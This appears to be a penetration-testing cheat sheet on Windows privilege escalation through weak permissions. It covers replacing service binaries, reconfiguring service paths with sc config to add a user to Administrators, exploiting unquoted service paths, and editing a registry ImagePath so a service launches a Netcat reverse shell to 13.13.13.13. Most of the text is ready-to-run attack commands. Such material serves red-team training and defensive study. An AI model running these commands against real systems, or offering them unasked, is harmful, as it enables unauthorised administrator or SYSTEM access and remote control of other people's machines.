Weak Permissions

Here would be an examples of weak permissions abuse

Permissive File System ACLs

Running SharpUp

• Tool: SharpUp from GhostPack to check for weak ACLs.

PS C:\> .\SharpUp.exe audit

• Example vulnerable service:

  • Name: SecurityService

  • Path: "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Checking Permissions with icacls

PS C:\> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

• Output shows Everyone and BUILTIN\Users have Full Control.

Replacing Service Binary with malicious one

C:\> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\> sc start SecurityService

• Replace with a malicious binary to gain SYSTEM privileges.

Weak Service Permissions

Checking Modifiable Services with SharpUp

C:\> SharpUp.exe audit

• Example vulnerable service:

  • Name: WindscribeService

  • Path: "C:\Program Files (x86)\Windscribe\WindscribeService.exe"

Checking Permissions with accesschk

C:\> accesschk.exe /accepteula -quvcw WindscribeService

• NT AUTHORITY\Authenticated Users has SERVICE_ALL_ACCESS (full control).

Changing the Service Binary Path

C:\> sc config WindscribeService binpath="cmd /c net localgroup administrators ven17 /add"

• Grants user ven17 administrator rights.

Stopping & Starting the Service

C:\> sc stop WindscribeService
C:\> sc start WindscribeService

• Executes the new binary path.

Confirming Privilege Escalation

C:\> net localgroup administrators

• Verify if ven17 was added to the Administrators group.

Resetting the Binary Path (Cleanup)

C:\> sc config WindscribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\> sc start WindscribeService
C:\> sc query WindscribeService

Unquoted Service Path

• If a service binary path is not enclosed in quotes, Windows may execute unintended binaries.

• Example vulnerable service:

  C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

• Windows may execute:

  • C:\Program.exe

  • C:\Program Files\System.exe

Finding Unquoted Service Paths

C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Permissive Registry ACLs

Checking for Weak Service ACLs in the Registry

C:\> accesschk.exe /accepteula "ven17" -kvuqsw hklm\System\CurrentControlSet\services

• Example vulnerable service: ModelManagerService

• Allows modification of the ImagePath.

Changing ImagePath with PowerShell

PS C:\> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\ven17\Downloads\nc.exe -e cmd.exe 13.13.13.13 443"

• Executes Netcat shell upon service start.

Modifiable Registry Autorun Binaries

Checking Startup Programs

PS C:\> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

• If the attacker can modify a startup binary, they can execute malicious code on user login.